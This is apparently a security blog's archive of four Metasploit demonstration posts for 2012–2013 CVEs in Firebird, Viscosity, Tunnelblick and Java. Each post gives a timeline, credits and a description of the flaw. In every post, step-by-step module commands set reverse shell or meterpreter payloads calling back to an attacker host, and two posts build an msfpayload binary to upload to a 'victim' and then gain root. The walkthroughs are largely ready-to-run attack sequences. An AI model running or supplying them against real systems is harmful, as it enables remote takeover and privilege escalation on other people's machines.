Category Archives: Metasploit

All my posts regarding Metasploit framework, auxiliaries, plugins and exploits.

CVE-2013-2492 Firebird Relational Database Vulnerability Metasploit Demo

Timeline :

Vulnerability discovered by Spencer McIntyre the 2013-01-31
Vulnerability reported to the vendor the 2013-03-05
Coordinate public release of the vulnerability the 2013-03-08
Metasploit PoC provided the 2013-03-08

PoC provided by :

Spencer McIntyre

Reference(s) :

CVE-2013-2492
CORE-4058

Affected version(s) :

Firebird versions 2.1.3-2.1.5 and 2.5.1-2.5.2

Tested on Windows XP Pro SP3 with :

FireBird 2.5.2.26539

Description :

This module exploits a vulnerability in Firebird SQL Server. A specially crafted packet can be sent which will overwrite a pointer allowing the attacker to control where data is read from. Shortly, following the controlled read, the pointer is called resulting in code execution. The vulnerability exists with a group number extracted from the CNCT information, which is sent by the client, and whose size is not properly checked. This module uses an existing call to memcpy, just prior to the vulnerable code, which allows a small amount of data to be written to the stack. A two-phases stackpivot allows to execute the ROP chain which ultimately is used to execute VirtualAlloc and bypass DEP.

Commands :

use exploit/windows/misc/fb_cnct_group
set RHOST 192.168.178.22
set TARGET 0
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.36
exploit

getuid
sysinfo

CVE-2012-4284 Setuid Viscosity Privilege Escalation Metasploit Demo

Timeline :

Vulnerability discovered and reported to the vendor by Jason A. Donenfeld the 2012-08-11
Vulnerability corrected by the vendor the 2012-08-30
Metasploit PoC provided the 2013-03-03

PoC provided by :

Jason A. Donenfeld
juan vazquez

Reference(s) :

CVE-2012-4284
OSVDB-84709

Affected version(s) :

Viscosity 1.4.1 and earlier

Tested on Mac OS X 10.7.5 x64 with :

Viscosity 1.4.1

Description :

This module exploits a vulnerability in Viscosity 1.4.1 on Mac OS X. The vulnerability exists in the setuid ViscosityHelper, where an insufficient validation of path names allows execution of arbitrary python code as root. This module has been tested successfully on Viscosity 1.4.1 over Mac OS X 10.7.5.

Commands :

Create a OS X x86 payload with msfpayload
msfpayload osx/x86/shell_reverse_tcp LHOST=192.168.178.26 X > osx-payload

Upload this payload on the victim OS X 10.7.5

use exploit/multi/handler
set PAYLOAD osx/x86/shell_reverse_tcp
set LHOST 192.168.178.26
exploit -j

Execute osx-payload, a session will be created.
This session runs with current user privileges.

use exploit/osx/local/setuid_viscosity
set SESSION 1
set PAYLOAD osx/x86/shell_reverse_tcp
set LPORT 4445
set LHOST 192.168.178.26
exploit

id

CVE-2012-3485 Setuid Tunnelblick Privilege Escalation Metasploit Demo

Timeline :

Vulnerability discovered and reported to the vendor by Jason A. Donenfeld the 2012-08-11
Metasploit PoC provided the 2013-03-03

PoC provided by :

Jason A. Donenfeld
juan vazquez

Reference(s) :

CVE-2012-3485

Affected version(s) :

Tunnelblick 3.2.8 and previous

Tested on Mac OS X 10.7.5 x64 with :

Tunnelblick 3.2.8

Description :

This module exploits a vulnerability in Tunnelblick 3.2.8 on Mac OS X. The vulnerability exists in the setuid openvpnstart, where an insufficient validation of path names allows execution of arbitrary shell scripts as root. This module has been tested successfully on Tunnelblick 3.2.8 build 2891.3099 over Mac OS X 10.7.5.

Commands :

Create a OS X x86 payload with msfpayload
msfpayload osx/x86/shell_reverse_tcp LHOST=192.168.178.26 X > osx-payload

Upload this payload on the victim OS X 10.7.5

use exploit/multi/handler
set PAYLOAD osx/x86/shell_reverse_tcp
set LHOST 192.168.178.26
exploit -j

Execute osx-payload, a session will be created.
This session runs with current user privileges.

use exploit/osx/local/setuid_tunnelblick
set SESSION 1
set PAYLOAD osx/x86/shell_reverse_tcp
set LPORT 4445
set LHOST 192.168.178.26
exploit

id

CVE-2013-0431 Java Applet JMX Remote Code Execution Metasploit Demo

Timeline :

Vulnerability discovered and reported to the vendor by Security Explorations the 2013-01-18
Vulnerability patched by the vendor the 2013-02-01
Vulnerability discovered exploited in the wild by kafeine and EKwatcher the 2013-02-18
Metasploit PoC provided the 2013-02-25

PoC provided by :

Unknown
Adam Gowdiak
SecurityObscurity
juan vazquez

Reference(s) :

CVE-2013-0431
OSVDB-89613
BID-57726
Malware don’t need Coffee
Security Explorations
Security Obscurity

Affected version(s) :

Java SE 7U11 and previous

Tested on Windows 7 Integral SP1 with :

Java SE 7U11

Description :

This module abuses the JMX classes from a Java Applet to run arbitrary Java code outside of the sandbox as exploited in the wild in February of 2013. Additionally, this module bypasses default security settings introduced in Java 7 Update 10 to run unsigned applet without displaying any warning to the user.

Commands :

use exploit/multi/browser/java_jre17_jmxbean_2
set SRVHOST 192.168.178.26
set TARGET 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.26
exploit

getuid
sysinfo